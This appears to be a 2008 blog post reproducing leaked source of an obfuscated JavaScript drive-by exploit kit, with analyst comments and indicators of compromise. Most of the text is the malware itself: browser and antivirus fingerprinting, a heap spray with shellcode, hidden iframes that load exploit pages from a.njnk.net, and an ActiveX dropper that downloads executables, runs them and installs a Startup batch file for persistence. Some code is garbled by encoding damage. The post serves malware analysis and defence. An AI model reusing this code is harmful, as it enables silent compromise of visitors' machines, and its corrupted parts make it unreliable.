The 10.000 Sites JS Malware Source Code Leaked
Sat, 22 Mar 2008 07:16:50 GMT
This will be old news if you follow Ronald's blog, but I've decided to make it public here as well, because the only way to fight this menace is by sharing and dissecting. The malware is heavily obfuscated, but not as much as it could be: just by glancing through the code you can see the key points of the execution process (browser/OS/AV fingerprinting, a heap spray, a chain of exploit pages, and a download-and-execute dropper).
http://b.njnk.net:80/E/J.JS <http://b.njnk.net/E/J.JS> — at the time of writing this was a live malware distribution host. Do not fetch it from a production or personal machine; treat the njnk.net hosts (and the paths under /E/ and /cgi-bin/jl/ that appear in the code below) as indicators of compromise.
// ---- Global state shared by every stage of the exploit kit ----
// Names are obfuscator-generated; the roles noted below are inferred from
// how each variable is read or written further down in this listing.
var z1IlbQFl0X = 0; // debug switch: when non-zero, dumps z1IlcFFl0X to the page and bypasses the cookie check in x0r1aP2Z
var z1IlaxFl0X = 0; // "already done" guard read by every exploit launcher; never assigned anywhere in this listing
var z1IlbPFl0X = 1; // enables the one-visit-per-victim cookie check in x0r1aP2Z
var z1IlbiFl0X = 0; // > 0 disables the ActiveX dropper path (x0r1az2Z)
var z1IlbCFl0X = 0; // > 0 disables the QuickTime path (z1IlNFl0X)
var z1IlbHFl0X = 0; // > 0 disables the ANI path (x0r1aG2Z)
var z1IlbIFl0X = 0; // > 0 disables the VML path (x0r1aB2Z)
var z1IlbfFl0X = "use" + "rid1" + "AF9122"; // cookie name ("userid1AF9122") that marks a victim as already served
var z1IlbcFl0X = "20"; // cookie value that means "already served"
var z1IlaoFl0X = "a.n" + "jnk." + "net"; // exploit/payload host ("a.njnk.net") -- treat as an IOC, do not contact
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0; // AV-probe bookkeeping: <object> error count, readystatechange count, "AV found" latch
var z1IlaAFl0X = ""; // browser family from x0r1aH2Z: "ie", "firefox", "opera" or "unknown"
var z1IlanFl0X = 0; // Windows version code from x0r1aJ2Z (NT major*10+minor, 48 for Win98, 0 if unknown)
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0; // IE major*100+minor, IE build number, QuickTime version, detected-AV id
var z1IlamFl0X = "n" + "one"; // "system_id" reported to the loader CGI; refined in x0r1aP2Z and used to pick the exploit in x0r1aV2Z
var z1IlcqFl0X; // declared but never used in this listing
var z1IlaSFl0X = 0; // set to 1 once the heap spray in z1IltFl0X has run
// Debug-only output: when z1IlbQFl0X is set, append z1IlcFFl0X to the page
// body and alert() it. z1IlcFFl0X is not defined anywhere in this listing;
// it is presumably the first unescape() string inside z1IltFl0X, whose
// declaration line is missing from this copy (see the corrupted lines there).
{
if(z1IlbQFl0X) {
document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "<b" + "r>";
}
}
{
if(z1IlbQFl0X) {
alert(z1IlcFFl0X);
}
}
// Cookie getter: returns the unescape()d value of cookie `name` from
// document.cookie, or null when the cookie string is empty or no cookie of
// that name is present. x0r1aP2Z uses it to skip victims that already carry
// the "served" marker cookie, so the exploit chain runs once per browser.
function x0r1aU2Z(name) {
var z1IlaFFl0X = document.cookie;
var z1IlaJFl0X = name + "=";
if(! z1IlaFFl0X) {
return null;
}
// Look for "; name=" first (cookie somewhere after the first one); otherwise
// the match must sit at the very start of the cookie string.
var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
if(z1IlaDFl0X == - 1) {
z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
if(z1IlaDFl0X != 0) {
return null;
}
}
else {
z1IlaDFl0X += 2; // skip the "; " separator
}
// Value runs up to the next ";" or to the end of the cookie string.
var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
if(z1IlbqFl0X == - 1) {
z1IlbqFl0X = z1IlaFFl0X.length;
}
return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
};
// Cookie setter: writes `name=escape(value)` with an expiry one year
// (365 days) from now. No path/domain attributes are set, so the browser's
// defaults apply. x0r1aV2Z calls it to plant the "served" marker after the
// exploit chain has been dispatched.
function x0r1aR2Z(name, value) {
var exp = new Date();
var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000); // 365 days in ms
exp.setTime(z1IlbVFl0X);
var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
document.cookie = z1IlbYFl0X;
};
// Grows a string by repeated self-concatenation until it is at least
// z1IlalFl0X bytes long (JS strings are UTF-16, so length*2 is the byte
// size), then truncates it to z1IlalFl0X/2 characters. The heap spray in
// z1IltFl0X uses this to size its NOP sled so that sled + shellcode fills one
// allocation block. Note: an empty seed string never terminates, as in the
// original.
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
    var sled = z1IlakFl0X;
    var targetChars = z1IlalFl0X / 2;
    for (;;) {
        var bytes = sled.length * 2;
        if (!(bytes < z1IlalFl0X)) {
            break;
        }
        sled = sled.concat(sled);
    }
    return sled.substring(0, targetChars);
};
// Heap spray. Allocates a large number of blocks, each a 0x9090 (NOP) sled
// followed by the shellcode string z1IlarFl0X, so that a corrupted pointer
// later steered to 0x0c0c0c0c by one of the exploit pages (VML, ANI,
// QuickTime) lands inside a sled and slides into the shellcode. Runs once
// (z1IlaSFl0X latch) and swallows every error.
//
// NOTE: this copy of the function is corrupted and will not run as shown:
//  - the variable name and opening `unescape("` of the first string are
//    missing (the string starts mid-expression on the line after the
//    `0 x0c0c0c0c` literal);
//  - hex literals carry a stray space (`0 x0c0c0c0c`, `0 x400000`, `0 x38`);
//  - many `%uXXXX` escapes were rendered as CJK characters by a bad
//    encoding pass, and a stray `*` precedes the second `var`;
//  - the z1IlarFl0X literal is never closed.
// The tail of the first string still decodes to ASCII fragments that look
// like the loader URL ("…nj","nk","et","/c","gi","-b","l/","jl","oa","r.",
// "?l","q/","q1"…), i.e. the same http://a.njnk.net/cgi-bin/jl/jloader.pl?
// loadfile=q/q1.dll that z1IlEFl0X downloads -- so this appears to be a
// download-and-execute payload; the exact bytes cannot be recovered here.
function z1IltFl0X() {
if(z1IlaSFl0X > 0) {
return;
}
try {
var z1IlbaFl0X = 0 x0c0c0c0c;
%" + "u" + "ee83%ufe3" + "a%u06" + "4e綍謄菎ᣁ諨%u" + "ffff%u"
+ "83ff%u0" + "c" + "c1Ƹ敮" + "%uc17" + "4ࣸ桐%" + "u6977楮" + "%udc"
+ "8b剑s" + "%u0" + "4" + "55奚%" + "ud08b%u" + "68e8" + "㏿%" + "u"
+ "50c0偐%u50" + "50嗿褜㑅" + "쀳偐偐嶍區%u75f" + "fT⁕%u458" + "9" + "%u"
+ "eb38㍴%u66c" + "0%u6c" + "b8偬%u7" + "1" + "68%u2e" + "31%" + "u8"
+ "964" + "づ%u" + "c033" + "%" + "ub050%u50" + "82%u02b" + "0㉐僀끐셀"
+ "ᣠp" + "%u30" + "75嗿" + "茈￸%" + "ud3" + "74%" + "u4589㌼%u66c"
+ "0%u0cb" + "8%u2b0" + "1诠" + "%u8df" + "4ў晓Ҹ" + "倁䚍%u50" + "08%u75"
+ "ffX%u24" + "55%u" + "468b%u85" + "04%u" + "74c0㌖%u50" + "c0%u46"
+ "8d倄盿%u8d" + "0" + "4" + "ࡆ" + "p㱵嗿" + "￐㱵" + "%u55f" + "f㌐%uff0"
+ "fふ%u55" + "ff%u8" + "304ી%u" + "ff50ᡕ%" + "uf7eb%" + "uf3e" + "8%u"
+ "ff" + "f" + "e" + "棿瑴㩰⼯⹡%u6" + "a6e%u" + "6b6e渮%u7" + "465%"
+ "u632f%u69" + "67%" + "u622d湩樯%u2" + "f6c%u" + "6c6a%u6" + "16"
+ "f敤" + "%" + "u2e72" + "汰" + "%u6" + "c3f慯晤汩㵥%u2f7" + "1" + "%"
+ "u" + "3171搮汬%u" + "f" + "fff");*var z1IlarFl0X = unescape("%"
+ "ueb55㍮%" + "u64c" + "0䂋蔰%u78c" + "0%u" + "560d%" + "u408b%" + "u"
+ "8b0cᱰ%" + "u8badࡀ%uc3" + "5e䂋" + "茴糀䂋쌼%u8b6" + "0%u2" + "46c"
+ "謤㱅%u7c" + "8b%u" + "78" + "05ﴃ例%u" + "8b18%u" + "20" + "5f�㏣%u8b"
+ "49" + "謴%u" + "f50" + "3쀳%uf" + "c99%" + "u84ac%u74c" + "0섇්퀃"
+ "%" + "uf4eb%u543" + "b⠤%ue27" + "5%u5" + "f" + "8b" + "̤曝ಋ譋ᱟ%udd"
+ "03ҋ%u03" + "8b觅%u" + "2444%u61" + "1" + "c굒%u" + "52" + "50ꧨ"
+ "%" + "u" + "89" + "ff茇" + "ࣄ잃" + "㬄痱쏬于%" + "uec0" + "e"
+ "%u17a" + "5%u7c" + "0" + "1%u7" + "91f%u" + "97fb࿽ﹲᚳ䦰�" + "䐩埨縏䮋%u5f"
+ "e" + "3%" + "u835e%u7" + "cec" + "%u4ce" + "8%" + "uffff%u8b"
+ "ff%uebd" + "0%ue8" + "0" + "5%uf" + "ff9%" + "ueb58赦"
+ "䁽肤%uf" + "f7e%u7" + "5ff%u4f" + "f9%u17f" + "6" + "
var z1IlaCFl0X = 0 x400000; // block size: 4 MB
var z1IlaWFl0X = z1IlarFl0X.length * 2; // shellcode size in bytes (UTF-16 chars)
var z1IlalFl0X = z1IlaCFl0X - (z1IlaWFl0X + 0 x38); // sled bytes = block minus shellcode minus 0x38 of allocation overhead
var z1IlakFl0X = unescape("邐%u9" + "090邐%u9" + "090邐邐%" + "u9090%u9" + "09" + "0"); // NOP sled seed (0x9090 pairs; some escapes garbled here too)
z1IlakFl0X = x0r1ax2Z(z1IlakFl0X, z1IlalFl0X); // grow the sled to fill the block
z1IlaZFl0X = (z1IlbaFl0X - 0 x400000) / z1IlaCFl0X; // (0x0c0c0c0c - 4 MB) / 4 MB ~= 47.2 -> 48 blocks, i.e. ~192 MB covering up to the target address
z1IlbyFl0X = new Array();
for(i = 0; i < z1IlaZFl0X; i++ ) {
z1IlbyFl0X[ i] = z1IlakFl0X + z1IlarFl0X; // sled + shellcode; the array keeps every block alive
}
z1IlaSFl0X = 1;
}
catch(e) {}
};
// Instantiates COM object `n` (a ProgID such as "Shell.Application",
// "adodb.stream", "msxml2.XMLHTTP", "WScript.Shell") through the host object
// z1IlavFl0X -- in this kit the <object> element created by x0r1az2Z from one
// of its candidate CLSIDs. Six call shapes are tried in order:
//   CreateObject(n), CreateObject(n, ""), CreateObject(n, "", ""),
//   GetObject("", n), GetObject(n, ""), GetObject(n)
// so that a single routine covers several ActiveX controls that expose an
// unsafe CreateObject/GetObject factory. Each attempt is built with eval()
// from string fragments so that the method names never appear literally in
// the file (signature evasion). Returns the object, or null if every attempt
// threw.
function x0r1aW2Z(z1IlavFl0X, n) {
var z1IlbvFl0X = null;
try {
eval("z1IlbvFl0X = z1IlavFl0X" + ".C" + "reat" + "eObject(n" + ")")
}
catch(e) {}
if(! z1IlbvFl0X) {
try {
eval("z1IlbvF" + "l0X = z1Ilav" + "Fl0X." + "Cre" + "ateObject(n, \"\"" + ")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1I" + "lbv" + "Fl0X" + " = z1" + "IlavFl0X.CreateObj" + "ect(n, \"\"," + " \"\")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1IlbvFl" + "0X = " + "z1IlavFl0X.GetObj" + "ect(" + "\"" + "\", n)")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1Ilbv" + "Fl0X = z" + "1IlavFl0X.G" + "etO" + "bject" + "(n, \"\")")
}
catch(e) {}
}
if(! z1IlbvFl0X) {
try {
eval("z1Ilbv" + "Fl0" + "X = z1Ila" + "v" + "Fl0X.GetObject(n)")
}
catch(e) {}
}
return(z1IlbvFl0X);
};
// Download-to-disk primitive. Fetches `url` synchronously with the XMLHTTP
// object `xml`, then writes the raw responseBody through the ADODB.Stream
// `z1IlavFl0X` (Type 1 = binary, Mode 3 = read/write) and saves it to the
// local path `z1IlczFl0X` (SaveToFile option 2 = overwrite existing file).
// There is no error handling: a failed request or write throws into the
// caller (z1IlEFl0X), which in turn is inside x0r1az2Z's try/catch.
function x0r1aN2Z(xml, z1IlavFl0X, url, z1IlczFl0X) {
xml.open("GET", url, false);
xml.send(null);
var z1IlcGFl0X = xml.responseBody;
z1IlavFl0X.Type = 1;
z1IlavFl0X.Mode = 3;
z1IlavFl0X.Open();
z1IlavFl0X.Write(z1IlcGFl0X);
z1IlavFl0X.SaveToFile(z1IlczFl0X, 2);
z1IlavFl0X.Close();
};
// Text-file writer: saves the string `z1IlbZFl0X` to path `z1IlcaFl0X`
// through the ADODB.Stream `z1IlavFl0X` (Type 2 = text, Mode 3 = read/write,
// SaveToFile option 2 = overwrite). The charset is forced to Windows-1251
// (Cyrillic code page), which hints at the author's locale but does not
// matter for the ASCII batch file z1IlEFl0X writes with it. Errors are
// swallowed, so a failed persistence write does not stop the dropper.
function x0r1bd2Z(z1IlavFl0X, z1IlbZFl0X, z1IlcaFl0X) {
try {
z1IlavFl0X.Type = 2;
z1IlavFl0X.Mode = 3;
z1IlavFl0X.Charset = "Win" + "dows-" + "1251";
z1IlavFl0X.Open();
z1IlavFl0X.WriteText(z1IlbZFl0X);
z1IlavFl0X.SaveToFile(z1IlcaFl0X, 2);
z1IlavFl0X.Close();
}
catch(z1IlcKFl0X) {}
};
// The dropper (download-and-execute stage). `a` is an ActiveX host object
// through which x0r1aW2Z can mint arbitrary COM objects. It:
//  1. creates XMLHTTP (msxml2, falling back to Microsoft.XMLHTTP),
//     ADODB.Stream and WScript.Shell;
//  2. reads %TEMP%, %PROGRAMFILES% and %USERPROFILE% from the process
//     environment;
//  3. downloads http://a.njnk.net/cgi-bin/jl/jloader.pl?loadfile=q/q1.dll
//     to %TEMP%\q1.dll and .../q/q2l.jpg to %TEMP%\q2l.exe (the payload is
//     served with a .jpg extension and renamed to .exe on disk);
//  4. builds the command line "q2l.exe" "q1.dll" "<PROGRAMFILES>\Internet
//     Explorer\iexplore.exe" -- presumably the EXE loads the DLL and injects
//     it into a fresh iexplore.exe, but that is the binaries' business and
//     not visible here;
//  5. persists it as <USERPROFILE>\Start Menu\Programs\Startup\startup.bat;
//  6. runs the command line via WScript.Shell.run.
// Returns true when run() succeeded, false when it threw. Steps 1-5 are not
// guarded here; their exceptions propagate to x0r1az2Z's try/catch.
// Defender IOCs: %TEMP%\q1.dll, %TEMP%\q2l.exe, Startup\startup.bat.
// NOTE: in this copy the command-line string literal is broken across two
// lines (after the trailing `"` + "`), which is a syntax error -- another
// artefact of the paste, not part of the original script.
function z1IlEFl0X(a) {
var z1IlbmFl0X = "/cgi-b" + "in/" + "jl/jload" + "er.pl?load" + "file=q"; // loader CGI path on the payload host
var z1IlaMFl0X = x0r1aW2Z(a, "m" + "sxml2.XM" + "LHTTP");
if(! z1IlaMFl0X) {
z1IlaMFl0X = x0r1aW2Z(a, "Microsoft" + ".XMLHTT" + "P");
}
var z1IlbbFl0X = x0r1aW2Z(a, "adodb" + ".st" + "ream");
var s = x0r1aW2Z(a, "WScript" + ".Shel" + "l");
var e = s.Environment("Proce" + "ss"); // process environment block (TEMP, PROGRAMFILES, USERPROFILE)
var z1IlckFl0X = "ht" + "tp://" + z1IlaoFl0X + z1IlbmFl0X + "/q" + "1.dll";
var z1IlcgFl0X = "http" + "://" + z1IlaoFl0X + z1IlbmFl0X + "/q" + "2l.jpg";
var z1IlcCFl0X = e.Item("TE" + "MP") + "\\q1.dl" + "l";
var z1IlclFl0X = e.Item("TEM" + "P") + "\\q2l." + "exe";
var z1IlcHFl0X = e.Item("PROGRAM" + "FIL" + "ES");
x0r1aN2Z(z1IlaMFl0X, z1IlbbFl0X, z1IlckFl0X, z1IlcCFl0X);
x0r1aN2Z(z1IlaMFl0X, z1IlbbFl0X, z1IlcgFl0X, z1IlclFl0X);
var z1IlbLFl0X = "\"" + z1IlclFl0X + "\"" + " \"" + z1IlcCFl0X + "\"" + "
\"" + z1IlcHFl0X + "\\I" + "nternet Exp" + "lorer\\ie" + "xp" + "lore.exe\"";
x0r1bd2Z(z1IlbbFl0X, "@ech" + "o" + " off\n" + z1IlbLFl0X + "\n",
e.Item("USERP" + "RO" + "FILE") + "\\Start M" + "enu\\Pr" + "og" +
"rams\\Startup\\sta" + "rtu" + "p.bat"); // persistence: re-run on every logon
try {
s.run(z1IlbLFl0X);
return true;
}
catch(e) {}
return false;
};
// Browser-family detection from navigator.userAgent. Returns "ie" only for
// a UA that contains "MSIE" and "Windows" but neither "Opera" nor "Firefox"
// (Opera could spoof MSIE at the time); in that case it also fills the
// globals z1IlaOFl0X (IE build, via x0r1aQ2Z) and z1IlapFl0X (IE version,
// via x0r1aI2Z). Otherwise returns "firefox", "opera" or "unknown".
function x0r1aH2Z() {
if(navigator.userAgent.indexOf("Oper" + "a") == - 1 && navigator.userAgent.indexOf("Firefo" + "x") == - 1 && navigator.userAgent.indexOf("M" + "SIE") != - 1 && navigator.userAgent.indexOf("W" + "indows") != - 1) {
z1IlaOFl0X = x0r1aQ2Z();
z1IlapFl0X = x0r1aI2Z();
return "ie";
}
if(navigator.userAgent.indexOf("Firefo" + "x") != - 1) {
return "firefo" + "x";
}
if(navigator.userAgent.indexOf("O" + "pera") != - 1) {
return "oper" + "a";
}
return "unkno" + "wn";
};
// Creates a DIV carrying IE's proprietary #default#clientCaps behavior and
// appends it to the body, storing it in the implicit global z1IlatFl0X.
// clientCaps exposes getComponentVersion(), which x0r1aQ2Z / x0r1aI2Z use
// to read the installed IE build without trusting the user-agent string.
function x0r1an2Z() {
z1IlatFl0X = document.createElement("DIV");
z1IlatFl0X.id = "z1I" + "latF" + "l0X";
z1IlatFl0X.addBehavior("#" + "default#cli" + "entCaps");
document.body.appendChild(z1IlatFl0X);
};
// QuickTime version probe. Returns 0 when QuickTime is absent; otherwise a
// packed number that z1IlNFl0X compares against 0x730 (7.3.0).
//  - IE: QuickTime is considered present only if ActiveXObject
//    'QuickTime.QuickTime' can be created. On IE < 7 the version is read
//    from QuickTimeCheckObject via `qt_check.z1IlblFl0X` -- that property
//    name looks like an obfuscator-mangled identifier (probably the
//    QuickTimeVersion property); as written it is undefined, and
//    (undefined & mask) >> 16 is 0, so this branch reports 0 and the
//    QuickTime exploit is effectively skipped on IE6/IE5. On IE >= 7 a
//    constant 0x100 is reported, which passes z1IlNFl0X's gate.
//  - Other browsers: scans navigator.plugins for a name containing
//    "QuickTime" and packs the dotted version as major<<8 | minor<<4 | patch.
//    If no such plug-in exists, plugin_str stays null, the regex matches
//    nothing, and `z1IlceFl0X[ 0]` throws a TypeError that nothing catches
//    (x0r1aP2Z calls this outside any try), aborting the whole script.
// Hex literals below carry a stray space (`0 xffff0000`, `0 x100`) -- a
// transcription artefact of this copy.
function z1IlIFl0X() {
var version = 0, qt_control;
if(z1IlaAFl0X == "ie") {
try {
qt_control = new ActiveXObject('QuickTime.QuickTime');
}
catch(e) {
return 0;
}
delete qt_control;
if(z1IlapFl0X < 700) {
try {
var qt_check = new ActiveXObject('QuickTimeCheckObject.QuickTimeCheck');
version = (qt_check.z1IlblFl0X & 0 xffff0000) >> 16; // see note above: property name appears mangled
delete qt_check;
}
catch(e) {}
}
else {
version = 0 x100;
}
}
else {
if(navigator.plugins != null && navigator.plugins.length > 0) {
var plugin_str = null;
for(var i = 0; i < navigator.plugins.length; i++ ) {
var z1IlaPFl0X = navigator.plugins[ i];
if(z1IlaPFl0X.name.indexOf("QuickTim" + "e") > - 1) {
plugin_str = z1IlaPFl0X.name; // last matching plug-in wins
}
}
var z1IlcDFl0X = /[\d.]+/ g;
var z1IlceFl0X = z1IlcDFl0X.exec(plugin_str); // null when no QuickTime plug-in -> next line throws
var z1IlaFl0X = z1IlceFl0X[ 0] .split(".");
version = (parseInt(z1IlaFl0X[ 0] ) << 8) + (parseInt(z1IlaFl0X[ 1] ) << 4);
if(z1IlaFl0X.length > 2) {
version += parseInt(z1IlaFl0X[ 2] );
}
}
}
return version;
};
// IE build-number probe via clientCaps. getComponentVersion() of GUID
// {89820200-ECBD-11CF-8B85-00AA005B4383} (presumably the Internet Explorer
// component itself) returns "a,b,c,d", which is packed as
// a*1e10 + b*1e8 + c*1e4 + d -- e.g. 6.0.2900.2180 -> 60029002180, the
// value x0r1aP2Z compares against to tell XP SP0/SP1/SP2 apart.
// Result goes into the implicit global z1IlbsFl0X (0 on any error);
// z1IlaBFl0X is declared but unused.
function x0r1aQ2Z() {
var z1IlbdFl0X, z1IlaRFl0X;
var z1IlaBFl0X;
try {
x0r1an2Z();
z1IlaRFl0X = z1IlatFl0X.getComponentVersion("{89820" + "200-" +
"ECBD-11CF" + "-8" + "B85-00AA005B4383}", "compo" + "nent" + "id");
z1IlbdFl0X = z1IlaRFl0X.split(",");
z1IlbsFl0X = parseInt(z1IlbdFl0X[ 0] ) * 10000000000 +
parseInt(z1IlbdFl0X[ 1] ) * 100000000 + parseInt(z1IlbdFl0X[ 2] ) * 10000 + parseInt(z1IlbdFl0X[ 3] );
}
catch(e) {
z1IlbsFl0X = 0;
}
return z1IlbsFl0X;
};
// IE version as major*100 + minor (e.g. 600 for IE 6.0, 700 for IE 7.0).
// Primary source is the same clientCaps component version used by
// x0r1aQ2Z (first two fields); if that throws (behavior unavailable), it
// falls back to parsing "MSIE x.y" out of the user-agent string. Returns 0
// when neither source yields a number.
function x0r1aI2Z() {
var z1IlbdFl0X, z1IlaRFl0X;
var z1IlaBFl0X = 0;
try {
if(! z1IlatFl0X) {
x0r1an2Z();
}
z1IlaRFl0X = z1IlatFl0X.getComponentVersion("{898202" + "00-ECBD-11CF-8B85-00" + "AA" + "005B4383" + "}", "c" + "ompon" + "entid");
z1IlbdFl0X = z1IlaRFl0X.split(",");
z1IlaBFl0X = parseInt(z1IlbdFl0X[ 0] ) * 100 + parseInt(z1IlbdFl0X[ 1] );
}
catch(e) {
var z1IlcDFl0X = /MSIE\s+(\d+)\.(\d+)/;
var z1IlbjFl0X = new Array;
if(z1IlbjFl0X = z1IlcDFl0X.exec(navigator.userAgent)) {
z1IlaBFl0X = parseInt(z1IlbjFl0X[ 1] ) * 100 + parseInt(z1IlbjFl0X[ 2] );
}
}
return z1IlaBFl0X;
};
// Firefox version from the user-agent, packed as
// major*1e6 + minor*1e4 + patch*100 + build (1.0.4 -> 1000400,
// 1.5.0.4 -> 1050004). Returns 0 if " Firefox/x.y" is not in the UA.
// x0r1aP2Z compares the result against those two thresholds to select the
// ff104 / ff150 exploit pages.
function x0r1aD2Z() {
var z1IlasFl0X, z1IlbdFl0X;
var z1IlbrFl0X = "", z1IlaBFl0X = 0;
z1IlbXFl0X = /\sFirefox\/([\d\.]+)\b/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(! z1IlasFl0X) {
return 0;
}
z1IlbdFl0X = z1IlasFl0X[ 1] .split(".");
z1IlaBFl0X = (parseInt(z1IlbdFl0X[ 0] ) * 1000000) + (parseInt(z1IlbdFl0X[ 1] ) * 10000);
if(z1IlbdFl0X.length > 2) {
z1IlaBFl0X += parseInt(z1IlbdFl0X[ 2] ) * 100;
}
if(z1IlbdFl0X.length > 3) {
z1IlaBFl0X += parseInt(z1IlbdFl0X[ 3] );
}
return z1IlaBFl0X;
};
// Windows version code from the user-agent: "Windows NT a.b" ->
// a*10 + b (50 = 2000, 51 = XP, 60 = Vista, as the labels in x0r1aP2Z
// assume), "Windows 98" -> 48, anything else -> 0 (which makes x0r1aP2Z
// skip every OS-specific branch).
function x0r1aJ2Z() {
var z1IlasFl0X;
var z1IlbnFl0X = 0;
z1IlbXFl0X = /Windows\sNT\s(\d)\.(\d)/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(! z1IlasFl0X) {
z1IlbXFl0X = /Windows\s98/;
z1IlasFl0X = z1IlbXFl0X.exec(navigator.userAgent);
if(z1IlasFl0X) {
z1IlbnFl0X = 48;
return z1IlbnFl0X;
}
return 0;
}
z1IlbnFl0X = parseInt(z1IlasFl0X[ 1] ) * 10 + parseInt(z1IlasFl0X[ 2] );
return z1IlbnFl0X;
};
// Loads a remote script by pointing the hidden <script id="z1IlbeFl0X">
// (created by x0r1aP2Z) at `z1IlbOFl0X`. Throws if the element is missing.
function x0r1aE2Z(z1IlbOFl0X) {
var z1IlcIFl0X = document.getElementById("z1" + "IlbeFl" + "0X");
z1IlcIFl0X.src = z1IlbOFl0X;
return true;
};
// Loads an exploit page into the hidden 0x0 <iframe id="z1IlaEFl0X">
// (created by x0r1aP2Z) by setting its src to `z1IlbRFl0X`. Every HTML
// exploit in this kit (VML, ANI, Firefox pages) is delivered this way.
function x0r1au2Z(z1IlbRFl0X) {
var iframe = document.getElementById("z1Il" + "aE" + "Fl0X");
iframe.src = z1IlbRFl0X;
return true;
};
// Loads http://a.njnk.net/E/isci/isci_my.js through the hidden script
// element, unless the z1IlaxFl0X guard is set. Not called anywhere in this
// listing -- likely a leftover or disabled exploit module.
function x0r1av2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1aE2Z("http" + "://" + z1IlaoFl0X + "/E/isci/isc" + "i_my" + ".js");
};
// Firefox 1.0.4 module: loads /E/ff104/ff104.htm into the hidden iframe.
// Selected by x0r1aV2Z for system_id "ff104", which x0r1aP2Z can never
// leave in place (it overwrites it with "ff"), so this is dead in this copy.
function x0r1aT2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/ff1" + "04/" + "ff104.htm");
};
// Firefox 1.5.x module: loads /E/ff154/ff154.htm into the hidden iframe.
// Selected by x0r1aV2Z for system_id "ff150" -- also unreachable in this
// copy for the same reason as x0r1aT2Z.
function x0r1aS2Z() {
if(z1IlaxFl0X) {
return true;
}
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/ff15" + "4/ff154" + ".htm");
};
// VML module: runs the heap spray, then loads /E/vml/vml.htm into the
// hidden iframe. The page is not included here; the path name suggests one
// of the IE VML (vgx.dll) memory-corruption bugs, which would explain why
// the spray at 0x0c0c0c0c is set up first. Disabled when z1IlbIFl0X > 0.
function x0r1aB2Z() {
if(z1IlbIFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
z1IltFl0X();
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E/vm" + "l/vml" + ".htm");
};
// ANI module: runs the heap spray, then loads /E/ani/ani5.htm into the
// hidden iframe. Again only the path is visible; the name suggests the
// animated-cursor (.ani) parsing bug. Disabled when z1IlbHFl0X > 0. x0r1X2Z
// skips this module entirely when an AV product was detected.
function x0r1aG2Z() {
if(z1IlbHFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
z1IltFl0X();
x0r1au2Z("http:" + "//" + z1IlaoFl0X + "/E" + "/" + "ani/ani5.htm");
};
// ActiveX "safe-for-scripting" dropper path (IE6/IE5 only, see x0r1aV2Z).
// Walks a list of 13 CLSIDs, creates an <object classid="clsid:..."> for
// each (braces stripped by the substring call), and asks x0r1aW2Z to mint a
// Shell.Application through it. The first control that hands back an object
// is passed to the dropper z1IlEFl0X, whose result is returned. Returns false
// if no control worked. Disabled when z1IlbiFl0X > 0.
// The first and last entries ({BD96C556-...-9E30} / {...-9E36}) are the
// CLSIDs widely documented as the MDAC RDS.DataSpace / RDS.DataControl
// objects abused by the MS06-014 exploit family; the others are further
// controls exposing an unsafe CreateObject/GetObject, not identified here.
// Note the `if(z1IlbFFl0X)` test is always true after createElement; the
// real failure signal is x0r1aW2Z returning null.
function x0r1az2Z() {
var z1IlbEFl0X = 0;
var z1IlctFl0X = false;
if(z1IlbiFl0X > 0) {
return false;
}
if(z1IlaxFl0X) {
return true;
}
var z1IlbpFl0X = new Array("{BD" + "9" + "6" +
"C556-65A3-11D0-983A-00C04FC2" + "9E30}", "{A" + "B9BCEDD-EC" +
"7E-47E1-9322-D4A210617" + "116" + "}", "{00" + "06F033-" + "0000-0000-C0" +
"00" + "-000000000046}", "{0006F03A-" + "00" + "00-000" + "0-C000-000" +
"000000046}", "{6" + "e" + "32070a-766d-4" + "ee6-879c-dc1fa" + "91d2fc3}",
"{6414512B-B978-" + "45" + "1D-A0D8-FCF" + "DF33E" + "833C}", "{7F5B7F63-F0" +
"6F-4" + "33" + "1-8A26-" + "339E03C0AE3D}", "{06723E09-F4" + "C2-" +
"43c8-8358-09FCD1" + "DB" + "0766}", "{639F725F-1" + "B2D-4831-A9" + "FD-874" +
"84768" + "2010}", "{BA" + "0185" + "99-1" + "DB3-44f9-83" + "B4-461454C84BF8}", "{D0C07D56-7C69-43" + "F1" + "-B4A0-25F5A11F" + "AB1" +
"9}", "{E8CCCDDF-CA2" + "8-" + "496" + "b-B050-" + "6C07C962476B}", "{BD96C5" +
"56-6" + "5A3-11D" + "0-9" + "83A-00C04FC29E36}", null); // null terminates the while loop below
while(z1IlbpFl0X[ z1IlbEFl0X] ) {
var z1IlbFFl0X = null;
z1IlbFFl0X = document.createElement("objec" + "t");
z1IlbFFl0X.setAttribute("clas" + "sid", "clsi" + "d:"
+ z1IlbpFl0X[ z1IlbEFl0X] .substring(1, z1IlbpFl0X[ z1IlbEFl0X] .length - 1));
if(z1IlbFFl0X) {
try {
var z1IlcvFl0X = x0r1aW2Z(z1IlbFFl0X, "S" + "hell." + "Application");
if(z1IlcvFl0X) {
z1IlctFl0X = z1IlEFl0X(z1IlbFFl0X); // control is scriptable: drop and run the payload through it
return z1IlctFl0X;
}
}
catch(e) {}
}
z1IlbEFl0X++;
}
return false;
};
// QuickTime module. Gate: disabled when z1IlbCFl0X > 0, skipped when no
